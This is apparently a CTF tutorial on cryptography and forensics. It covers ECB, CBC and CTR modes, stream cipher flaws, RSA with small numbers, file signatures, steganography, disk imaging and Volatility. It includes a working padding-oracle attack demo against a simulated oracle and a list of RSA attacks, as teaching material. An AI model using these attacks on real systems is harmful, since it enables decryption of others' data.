Original Image	ECB Image	Other Block Cipher Modes
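The pattern leak can be reproduced without an image. The sketch below uses a toy 16-byte Feistel cipher built from SHA-256 as a stand-in for a real block cipher such as AES; the cipher, the key, and all function names are assumptions for illustration and must not be used for real encryption.

```python
import hashlib

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    # Round function of the toy Feistel network (illustrative only).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def toy_encrypt_block(key, block):
    """Encrypt one 16-byte block with a 4-round Feistel network."""
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def ecb_encrypt(key, plaintext):
    """ECB: every block is encrypted on its own, with no chaining."""
    assert len(plaintext) % BLOCK == 0
    return b"".join(
        toy_encrypt_block(key, plaintext[i:i + BLOCK])
        for i in range(0, len(plaintext), BLOCK)
    )

key = b"hypothetical key"
plaintext = b"A" * 16 + b"B" * 16 + b"A" * 16  # blocks 0 and 2 are identical
ciphertext = ecb_encrypt(key, plaintext)
blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]

print(blocks[0] == blocks[2])  # True: equal plaintext blocks leak through
print(blocks[0] == blocks[1])  # False
```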

Cipher Block Chaining (CBC)

CBC is an improvement upon ECB where an Initialization Vector is used to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of

CBC Encryption CBC Decryption

Note

Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.
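The note about the IV can be checked with a short sketch. It reuses a toy SHA-256 based Feistel cipher in place of a real block cipher; the cipher, key, IVs, and function names are all assumptions made for the example, and no padding is applied.

```python
import hashlib

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def toy_encrypt_block(key, block):
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def toy_decrypt_block(key, block):
    # Undo the Feistel rounds in reverse order.
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def cbc_encrypt(key, iv, plaintext):
    prev, out = iv, []
    for i in range(0, len(plaintext), BLOCK):
        # Each block is XORed with the previous ciphertext block first.
        prev = toy_encrypt_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(_xor(toy_decrypt_block(key, block), prev))
        prev = block  # depends only on ciphertext, so blocks are independent
    return b"".join(out)

key = b"hypothetical key"
iv = bytes(range(1, 17))
plaintext = b"A" * 16 + b"B" * 16 + b"C" * 16
ciphertext = cbc_encrypt(key, iv, plaintext)

good = cbc_decrypt(key, iv, ciphertext)
wrong = cbc_decrypt(key, bytes(16), ciphertext)  # deliberately wrong IV

print(good == plaintext)             # True
print(wrong[16:] == plaintext[16:])  # True: only the first block is damaged
```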

Propagating Cipher Block Chaining (PCBC)

PCBC is a less-used cipher that modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process "propagate" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.

PCBC Encryption PCBC Decryption

Counter (CTR)

Note

Counter mode is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC) mode.

CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.

CTR Encryption CTR Decryption
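A minimal sketch of the idea follows. HMAC-SHA256 stands in for the keyed block function F, and the 8-byte nonce is concatenated with a 64-bit counter; the key, nonce, and function names are assumptions for illustration rather than a standard construction.

```python
import hashlib
import hmac

BLOCK = 16

def keystream_block(key, nonce, counter):
    """Derive one 16-byte keystream block from nonce || counter."""
    message = nonce + counter.to_bytes(8, "big")
    return hmac.new(key, message, hashlib.sha256).digest()[:BLOCK]

def ctr_xor(key, nonce, data, start_block=0):
    """Encrypt or decrypt: the same XOR operation does both."""
    out = bytearray()
    for offset in range(0, len(data), BLOCK):
        ks = keystream_block(key, nonce, start_block + offset // BLOCK)
        chunk = data[offset:offset + BLOCK]
        out.extend(c ^ k for c, k in zip(chunk, ks))
    return bytes(out)

key = b"hypothetical key"
nonce = b"\x00" * 7 + b"\x01"  # 8-byte nonce; must never repeat under one key
plaintext = b"counter mode turns a block cipher into a stream"

ciphertext = ctr_xor(key, nonce, plaintext)
print(ctr_xor(key, nonce, ciphertext) == plaintext)  # True

# Random access: decrypt only the second block by starting the counter at 1.
print(ctr_xor(key, nonce, ciphertext[16:32], start_block=1))
```

Because each keystream block depends only on the key, nonce, and counter, blocks can be processed in any order or in parallel.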

Security Considerations

If the nonce chosen is non-random, it is important to concatenate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter) as adding or XORing the nonce with the counter would break security as an attacker can cause a collision with the nonce and counter. An attacker with access to providing a plaintext, nonce, and counter can then decrypt a block by using the ciphertext as seen in the decryption image.

Padding Oracle Attack

A Padding Oracle Attack sounds complex but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.

Requirements

An oracle, or program, which decrypts CBC ciphertext and reveals whether the padding of the result was valid
Continual use of the same key

Execution

If we have two blocks of ciphertext, C1 and C2, we can get the plaintext P2
Since CBC decryption of a block depends on the prior ciphertext block, we can change the last byte of C1 and ask the oracle whether C2 still decrypts with correct padding
If it is correctly padded, we know that the last byte of the modified plaintext is 0x01, which reveals the last byte of P2
If not, we can increase our byte by one and repeat until we have a successful padding
We then repeat this for every remaining byte of the block, working backward from the end; if the block is 16 bytes we can expect a maximum of 4080 attempts, which is trivial
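The steps above can be sketched end to end. Everything here is a toy setup assumed for illustration: a SHA-256 based Feistel cipher replaces a real block cipher, `KEY` is known only to the simulated server, PKCS#7 padding is assumed, and `padding_oracle` plays the role of a server that reports padding errors.

```python
import hashlib

BLOCK = 16
KEY = b"server-side secret"  # hypothetical key, never used by the attacker

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(i, half):
    return hashlib.sha256(KEY + bytes([i]) + half).digest()[:8]

def _enc(block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(i, r))
    return l + r

def _dec(block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(i, l)), l
    return l + r

def cbc_encrypt(iv, msg):
    pad = BLOCK - len(msg) % BLOCK
    msg += bytes([pad]) * pad  # PKCS#7 padding
    prev, out = iv, b""
    for i in range(0, len(msg), BLOCK):
        prev = _enc(_xor(msg[i:i + BLOCK], prev))
        out += prev
    return out

def padding_oracle(prev_block, block):
    """Server side: True if `block` decrypts to validly padded data."""
    plain = _xor(_dec(block), prev_block)
    n = plain[-1]
    return 1 <= n <= BLOCK and plain.endswith(bytes([n]) * n)

def recover_block(prev_block, block):
    """Attacker side: recover a plaintext block using only the oracle."""
    intermediate = bytearray(BLOCK)  # Dec(block), learned byte by byte
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = intermediate[j] ^ pad  # known tail decrypts to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not padding_oracle(bytes(forged), block):
                continue
            if pad == 1:
                # Rule out accidental paddings such as 02 02 by
                # disturbing the neighbouring byte and asking again.
                forged[pos - 1] ^= 0xFF
                still_valid = padding_oracle(bytes(forged), block)
                forged[pos - 1] ^= 0xFF
                if not still_valid:
                    continue
            intermediate[pos] = guess ^ pad
            break
    return _xor(intermediate, prev_block)

iv = bytes(range(BLOCK))
secret = b"flag{padding_oracles_leak}"
ct = cbc_encrypt(iv, secret)
blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
recovered = b"".join(
    recover_block(blocks[i], blocks[i + 1]) for i in range(len(blocks) - 1)
)
print(recovered)  # the secret followed by its padding bytes
```

The attacker never touches `KEY` or `_dec` directly; every fact is learned from the True/False answers of `padding_oracle`.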

Stream Ciphers

A Stream Cipher is used for symmetric key cryptography, where the same key is used to encrypt and decrypt data. Stream Ciphers combine a pseudorandom sequence with the bits of the plaintext to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is as generators of one-time pads from a given state.

Definitions

A keystream is a sequence of pseudorandom digits that extend to the length of the plaintext to uniquely encrypt each character based on the corresponding digit in the keystream

One-Time Pads

A one-time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers to generate a random ciphertext. The advantage of the one-time pad is that it offers an immense amount of security BUT for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one-time pads have little use in modern-day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128-bit in length, to seed a pseudorandom keystream which is used to encrypt the text.

Types of Stream Ciphers

Synchronous Stream Ciphers

A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is a stream cipher that XORs the bits of the keystream with the bits of the plaintext. Encryption and decryption require that the synchronous stream cipher be in the same state; otherwise, the message cannot be decrypted.

Self-synchronizing Stream Ciphers

A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher that uses the previous N digits to compute the keystream used for the next N characters.

Note

Seems a lot like block ciphers doesn't it? That's because block cipher feedback mode (CFB) is an example of a self-synchronizing stream cipher.

Stream Cipher Vulnerabilities

Key Reuse

The key tenet of using stream ciphers securely is to NEVER reuse a key, because XOR cancels itself out. If C1 and C2 were both produced by XORing with the same keystream K, then K drops out: C1 XOR C2 = P1 XOR P2. When the plaintexts are English text, cryptanalysis tools such as character frequency analysis work well on P1 XOR P2 due to the low entropy of the English language, and once either plaintext is known, K = C1 XOR P1 follows immediately.
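A short sketch of the cancellation, using a random byte string as a stand-in for the keystream and two made-up messages of equal length:

```python
import os

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

keystream = os.urandom(30)  # stands in for the cipher's keystream K
p1 = b"attack at dawn, bring the maps"
p2 = b"retreat at dusk, burn the maps"

c1 = xor(p1, keystream)
c2 = xor(p2, keystream)  # same keystream reused: the mistake

mixed = xor(c1, c2)
print(mixed == xor(p1, p2))  # True: the keystream has cancelled out

# If the attacker knows (or guesses) p1, p2 and K follow immediately.
print(xor(mixed, p1))              # recovers p2
print(xor(c1, p1) == keystream)    # True
```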

Bit-flipping Attack

Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronous stream cipher.
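The 'Transfer $1000' example works because the characters '1' (0x31) and '9' (0x39) differ in a single bit. A minimal sketch, with a random keystream standing in for a synchronous stream cipher:

```python
import os

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

plaintext = b"Transfer $1000"
keystream = os.urandom(len(plaintext))  # unknown to the attacker
ciphertext = bytearray(xor(plaintext, keystream))

# The attacker only knows the message layout: the first digit follows '$'.
index = 10
flip = ord("1") ^ ord("9")   # 0x08, a single bit
ciphertext[index] ^= flip    # modify the ciphertext in transit

tampered = xor(bytes(ciphertext), keystream)  # what the receiver decrypts
print(tampered)  # b'Transfer $9000'
```

This is why stream ciphers are paired with a message authentication code in practice: decryption succeeding says nothing about integrity.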

RSA

RSA, which is an abbreviation of its authors' names (Rivest–Shamir–Adleman), is a cryptosystem that allows for asymmetric encryption. Asymmetric cryptosystems are also commonly referred to as Public Key Cryptography, where a public key is used to encrypt data and only the secret private key can be used to decrypt it.

Definitions

The Public Key is made up of (n, e)
The Private Key is made up of (n, d)
The message is represented as m and is converted into a number
The encrypted message or ciphertext is represented by c
p and q are prime numbers which make up n
e is the public exponent
n is the modulus and its length in bits is the bit length (i.e. 1024 bit RSA)
d is the private exponent
The totient λ(n) is used to compute d and is equal to the lcm(p-1, q-1), another definition for λ(n) is that λ(pq) = lcm(λ(p), λ(q))

What makes RSA viable?

If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:

(m^e)^d ≡ m (mod n)

Note

The triple equals sign in this case refers to modular congruence, which here means that there exists an integer k such that (m^e)^d = kn + m

RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.

Implementation

RSA follows 3 steps to be implemented:

1. Key Generation
2. Encryption
3. Decryption

Key Generation

We are going to follow Wikipedia's small numbers example to make this idea a bit easier to understand.

Note

In this example, we are using Carmichael's totient function where λ(n) = lcm(λ(p), λ(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is φ(n) = (p − 1)(q − 1)

Choose two prime numbers such as:
- p = 61 and q = 53
Find n:
- n = pq = 3233
Calculate λ(n) = lcm(p-1, q-1)
- λ(3233) = lcm(60, 52) = 780
Choose a public exponent e such that 1 < e < λ(n) and e is coprime to λ(n) (they share no common factor other than 1). The standard in most cases is 65537, but we will be using:
- e = 17
Calculate d as the modular multiplicative inverse of e modulo λ(n); in other words, find d such that: de mod λ(n) = 1
- d * 17 mod 780 = 1
- d = 413

Now we have a public key of (3233, 17) and a private key of (3233, 413)
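The key generation steps can be reproduced in a few lines of Python. This sketch assumes Python 3.8 or later, where `pow(e, -1, lam)` computes a modular inverse; the variable name `lam` stands for λ(n).

```python
from math import gcd

p, q = 61, 53
n = p * q                                     # modulus
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)  # lcm(p-1, q-1)

e = 17
assert gcd(e, lam) == 1   # e must be coprime to lambda(n)

d = pow(e, -1, lam)       # modular multiplicative inverse of e

print(n, lam, d)          # 3233 780 413
print((d * e) % lam)      # 1
```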

Encryption

With the public key, m can be encrypted trivially

The ciphertext is equal to m**e mod n or:

c = m^17 mod 3233

Decryption

With the private key, m can be decrypted trivially as well

The plaintext is equal to c**d mod n or:

m = c^413 mod 3233
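With the toy key pair from this example, encryption and decryption are each a single modular exponentiation. The message value m = 65 is an arbitrary choice for illustration; it must be smaller than n.

```python
n, e, d = 3233, 17, 413

m = 65                   # message as a number, must satisfy 0 < m < n
c = pow(m, e, n)         # encryption with the public key (n, e)
recovered = pow(c, d, n) # decryption with the private key (n, d)

print(c)          # 2790
print(recovered)  # 65
```

Python's three-argument `pow` performs modular exponentiation efficiently, so the same calls work for realistically sized keys.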

Exploitation

From the RsaCtfTool README

Attacks:

Weak public key factorization

Wiener's attack

Hastad's attack (Small public exponent attack)

Small q (q < 100,000)

Common factor between ciphertext and modulus attack

Fermat's factorization for close p and q

Gimmicky Primes method

Past CTF Primes method

Self-Initializing Quadratic Sieve (SIQS) using Yafu

Common factor attacks across multiple keys

Small fractions method when p/q is close to a small fraction

Boneh Durfee Method when the private exponent d is too small compared to the modulus (i.e d < n^0.292)

Elliptic Curve Method

Pollards p-1 for relatively smooth numbers

Mersenne primes factorization
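To give a feel for one entry in the list, here is a minimal sketch of Fermat's factorization, which is fast when p and q are close together. It is an independent illustration, not RsaCtfTool's implementation, and the function name `fermat_factor` and the `max_steps` limit are assumptions.

```python
from math import isqrt

def fermat_factor(n, max_steps=1_000_000):
    """Search for a, b with n = a*a - b*b = (a - b)(a + b); n must be odd."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None  # primes too far apart for this step budget

print(fermat_factor(3233))  # (53, 61)
```

Once p and q are known, the private exponent follows from the key generation steps described earlier.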

Forensics

https://ctf101.org/forensics

Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data that is seemingly deleted, not stored, or worse, covertly recorded.

An important part of Forensics is having the right tools, as well as being familiar with the following topics:

File Formats
EXIF data
Wireshark & PCAPs
- What is Wireshark
Steganography
Disk Imaging

File Formats

File extensions are not the sole way to identify the type of a file. Files have certain leading bytes called file signatures, which allow programs to parse the data consistently. Files can also contain additional "hidden" data called metadata, which can be useful in finding out information about the context of a file's data.

File Signatures

File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally, they’re 2-4 bytes long, found at the beginning of a file.

What is it used for?

Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type to open properly.

How do you find the file signature?

You need to be able to look at the binary data that constitutes the file you’re examining. To do this, you’ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler’s.

Example

File A

The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600 or in ASCII ˇÿˇ‡ JFIF where \x00 and \x10 lack symbols.

Searching in Gary Kessler’s database shows that this file signature belongs to a JPEG/JFIF graphics file, exactly what we suspect.
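The lookup can also be automated. The sketch below checks a file's leading bytes against a small, hand-picked table of well-known signatures; the table is far from complete and the function names are chosen for this example.

```python
# A few well-known magic numbers (not an exhaustive list).
SIGNATURES = {
    b"\xFF\xD8\xFF": "JPEG image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"GIF87a": "GIF image",
    b"GIF89a": "GIF image",
    b"%PDF-": "PDF document",
    b"PK\x03\x04": "ZIP archive",
    b"\x7fELF": "ELF executable",
}

def identify(header):
    """Match the leading bytes of a file against known signatures."""
    for magic, name in SIGNATURES.items():
        if header.startswith(magic):
            return name
    return "unknown"

def identify_file(path):
    with open(path, "rb") as f:
        return identify(f.read(16))

# The leading bytes of File A from the example above.
header = bytes.fromhex("FFD8FFE000104A46494600")
print(identify(header))  # JPEG image
```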

Metadata

Metadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number, and album.

What kind of file metadata is useful?

Potentially, any file metadata you can find could be useful.

How do I find it?

EXIF Data is metadata attached to photos which can include location, time, and device information.

One of our favorite tools is ExifTool, which displays metadata for an input file, including:

- File size
- Dimensions (width and height)
- File type
- Programs used to create (e.g. Photoshop)
- OS used to create (e.g. Apple)

Run command line: exiftool(-k).exe [filename] and you should see something like this:

Exiftool

Example

Let's take a look at File A's metadata with ExifTool:

File type

Metadata 1

Image description

Metadata 2

Make and camera info

Metadata 3

GPS Latitude/Longitude

Metadata 4

Timestamps

Timestamps are data that indicate the time of certain events (MAC):

- Modification – when a file was modified
- Access – when a file or entries were read or accessed
- Creation – when files or entries were created

Types of timestamps

Modified
Accessed
Created
Date Changed (MFT)
Filename Date Created (MFT)
Filename Date Modified (MFT)
Filename Date Accessed (MFT)
INDX Entry Date Created
INDX Entry Date Modified
INDX Entry Date Accessed
INDX Entry Date Changed

Why do we care?

Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.
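On a live file system, the basic MAC times can be read with Python's `os.stat`. This is only a sketch: the helper name `mac_times` is made up, and `st_ctime` means creation time on Windows but last metadata change on most Unix systems, so it is labeled accordingly.

```python
import os
from datetime import datetime, timezone

def mac_times(path):
    """Return the file's timestamps as timezone-aware UTC datetimes."""
    st = os.stat(path)

    def to_utc(ts):
        return datetime.fromtimestamp(ts, tz=timezone.utc)

    return {
        "modified": to_utc(st.st_mtime),
        "accessed": to_utc(st.st_atime),
        # Creation time on Windows, metadata change time on most Unix systems.
        "changed_or_created": to_utc(st.st_ctime),
    }

for name, when in mac_times(".").items():
    print(f"{name:>20}: {when.isoformat()}")
```

Sorting these values across several files gives a first rough timeline. Note that reading a file on a mounted drive can itself update access times, which is one reason to work from a forensic image.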

Timeline Patterns

There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.

Timeline 1 Timeline 2 Timeline 3 Timeline 4 Timeline 5

Examples

We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?

Files A, B, C, D

By using timestamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileA, and fileC was created by modifying fileA differently.

Follow along as we demonstrate.

We’ll start by analyzing images in AccessData FTK Imager, where there’s a Properties window that shows you some information about the file or folder you’ve selected.

Timestamp 1 Timestamp 2 Timestamp 3 Timestamp 4

Here are the extracted MAC times for fileA, fileB, fileC, and fileD:

Note: AccessData FTK Imager assumes that the file times on the drive are in UTC (Coordinated Universal Time). I subtracted four hours since the USB was set up in Eastern Standard Time. This isn’t necessary, but it helps me understand the times a bit better.

Timestamp 5

Highlight timestamps that are the same; if timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.

Timestamp 6 Timestamp 7 Timestamp 8 Timestamp 9 Timestamp 10 Timestamp 11 Timestamp 12 Timestamp 13 Timestamp 14 Timestamp 15

Identify timestamp patterns.

Timestamp 16

Wireshark

Wireshark is a network protocol analyzer that is often used in CTF challenges to look at recorded network traffic. Wireshark uses a file type called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.

Interface

Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.

Wireshark Start Screen

The network traffic displayed initially shows the packets in the order in which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.

PCAP Screen

To apply filters, simply enter the constraining factor, for example, 'http', in the display filter bar.

PCAP HTTP Filter

Filters can be chained together using the '&&' notation. To filter by IP, ensure a double equals '==' is used.

PCAP HTTP IP Filter

The most pertinent part of a packet is its data payload and protocol information.

HTTP TCP Info

Decrypting SSL Traffic

By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.

High-Level SSL Handshake Overview

For a network session to be encrypted properly, the client and server must share a common secret that they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:

The client sends a list of available cipher suites it can use along with a random set of bytes referred to as client_random
The server sends back the cipher suite that will be used, such as TLS_DHE_RSA_WITH_AES_128_CBC_SHA, along with a random set of bytes referred to as server_random
The client generates a pre-master secret, encrypts it, then sends it to the server.
The server and client then generate a common master secret using the selected cipher suite
The client and server begin communicating using this common secret

Decryption Requirements

There are several ways to be able to decrypt traffic.

If you have the client and server random values and the pre-master secret, the master secret can be generated and used to decrypt the traffic
If you have the master secret, traffic can be decrypted easily
If the cipher-suite uses RSA, you can factor n in the key to break the encryption on the encrypted pre-master secret and generate the master secret with the client and server randoms

Wireshark SSL Preferences

Steganography

Steganography is the practice of hiding data in plain sight. The hidden data is often embedded in images or audio.

You could send a picture of a cat to a friend and hide text inside. Looking at the image, there’s nothing to make anyone think there’s a message hidden inside it.

Steg with text

You could also hide a second image inside the first.

Steg with an Image

Steganography Detection

So we can hide text and an image, how do we find out if there is hidden data?

Group of images

FileA and FileD appear the same, but they’re different. Also, FileD was modified after it was copied, so it’s possible there might be steganography in it.

FileB and FileC don’t appear to have been modified after being created. That doesn’t rule out the possibility that there’s steganography in them, but you’re more likely to find it in fileD. This brings up two questions:

Can we determine that there is steganography in fileD?
If there is, what was hidden in it?

LSB Steganography

Files are made of bytes. Each byte is composed of eight bits.

Steganography Process Step 1

Changing the least-significant bit (LSB) doesn’t change the value very much.

Steganography Process Step 2

So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.

LSB Steganography in Images

LSB Steganography or Least Significant Bit Steganography is a method of steganography where data is recorded in the lowest bit of a byte.

Say an image has a pixel with an RGB value of (255, 255, 255), the bits of those RGB values will look like

1	1	1	1	1	1	1	1

By modifying the lowest, or least significant, bit, we can use the 1-bit space across every RGB value for every pixel to construct a message.

1	1	1	1	1	1	1	0

The reason steganography is hard to detect by sight is that a 1-bit difference in color is insignificant as seen below.

1 Bit Difference

Example

Let’s say we have an image, and part of it contains the following binary:

Steganography Process Step 3

And let’s say we want to hide the character y inside.

First, we need to convert the hidden message to binary.

Steganography Process Step 4

Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.

Steganography Process Step 5

And again:

Steganography Process Step 6

And again:

Steganography Process Step 7

And again:

Steganography Process Step 8

And again:

Steganography Process Step 9

And again:

Steganography Process Step 10

And again:

Steganography Process Step 11

And once more:

Steganography Process Step 12

Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you’ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
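The encode and decode steps can be sketched on a raw byte string. The cover bytes below are made up and stand in for pixel data; a real image would first need to be decoded into raw pixel values, and the function names are chosen for this example.

```python
def lsb_embed(cover, message):
    """Hide `message` in the least-significant bits of `cover`, MSB first."""
    bits = [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover is too small for this message")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit  # clear the LSB, then set it
    return bytes(stego)

def lsb_extract(stego, n_bytes):
    """Read back `n_bytes` bytes from the least-significant bits."""
    out = bytearray()
    for i in range(n_bytes):
        value = 0
        for byte in stego[i * 8:(i + 1) * 8]:
            value = (value << 1) | (byte & 1)
        out.append(value)
    return bytes(out)

cover = bytes([200, 201, 202, 203, 204, 205, 206, 207])  # hypothetical pixel bytes
stego = lsb_embed(cover, b"y")

print(list(stego))
print(lsb_extract(stego, 1))  # b'y'
print(max(abs(a - b) for a, b in zip(cover, stego)))  # at most 1 per byte
```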

What other types of steganography are there?

Steganography is hard for the defense side because there’s practically an infinite number of ways it could be carried out. Here are a few examples:

- LSB steganography: different bits, different bit combinations
- Encode in every certain number of bytes
- Use a password
- Hide in different places
- Use encryption on top of steganography

Disk Imaging

A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It’s a bit-by-bit or bitstream file that’s an exact, unaltered copy of the media being duplicated.

Wikipedia said that the most straightforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. “This can be a time-consuming process, especially for disks with a large capacity,” Wikipedia said.

To prevent write access to the disk, you can use a write blocker. It’s also common to calculate a cryptographic hash of the entire disk when imaging it. “Commonly-used cryptographic hashes are MD5, SHA1, and/or SHA256,” said Wikipedia. “By recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself does not protect against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.”

Why image a disk? Forensic imaging:

- Prevents tampering with the original data evidence
- Allows you to play around with the copy, without worrying about messing up the original

Forensic Image Extraction Example

This example uses the tool AccessData FTK Imager.

Step 1: Go to File > Create Disk Image

File Image Demo

Step 2: Select Physical Drive, because the USB or hard drive you’re imaging is a physical device or drive.

File Image Demo

Step 3: Select the drive you’re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.

File Image Demo

Step 4: Add a new image destination

File Image Demo

Step 5: Select whichever image type you want. Choose Raw (dd) if you’re a beginner, since it’s the most common type

File Image Demo

Step 6: Fill in all the evidence information

File Image Demo

Step 7: Choose where you want to store it

File Image Demo

Step 8: The image destination has been added. Now you can start the image extraction

File Image Demo

Step 9: Wait for the image to be extracted

File Image Demo

Step 10: This is the completed extraction

File Image Demo

Step 11: Add the image you just created so that you can view it

File Image Demo

Step 12: This time, choose the image file, since that’s what you just created

File Image Demo

Step 13: Enter the path of the image you just created

File Image Demo

Step 14: View the image.

Evidence tree Structure of the drive image
File list List of all the files in the drive image folder
Properties Properties of the file/folder being examined
Hex viewer View of the drive/folders/files in hexadecimal

File Image Demo

Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root] in the Evidence Tree and look in the File List

File Image Demo

Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo

File Image Demo

Step 17: Extract files of interest for further analysis by selecting, right-clicking, and choosing Export Files

File Image Demo

Memory Forensics

There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuable information can be found within memory dumps, that is, images taken of RAM. These dumps of data are often very large but can be analyzed using a tool called Volatility.

Volatility Basics

Memory forensics isn't all that complicated; the hardest part is using your toolset correctly. A good workflow is as follows:

Run strings for clues
Identify the image profile (which OS, version, etc.)
Dump processes and look for suspicious processes
Dump data related to interesting processes
View data in a format relating to the process (Word: docx, Notepad: txt, Photoshop: psd, etc.)
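The first step of this workflow, running strings, can be approximated in Python when the `strings` utility is not available. This sketch only finds printable ASCII runs (not UTF-16), and the sample bytes are invented for the demo.

```python
import re

def extract_strings(data, min_len=4):
    """Return runs of at least `min_len` printable ASCII characters."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [match.decode("ascii") for match in re.findall(pattern, data)]

# Hypothetical fragment of a memory dump.
sample = b"\x00\x01flag{mem}\x00ab\x00notepad.exe\xff"
print(extract_strings(sample))  # ['flag{mem}', 'notepad.exe']
```

For a real dump, read the file in binary mode and filter the results for keywords such as flag formats, URLs, or file names.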

Profile Identification

To properly use Volatility you must supply a profile with --profile=PROFILE, therefore before any sleuthing, you need to determine the profile using imageinfo:

$ python vol.py -f ~/image.raw imageinfo
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search...

          Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)
                      PAE type : PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002803070
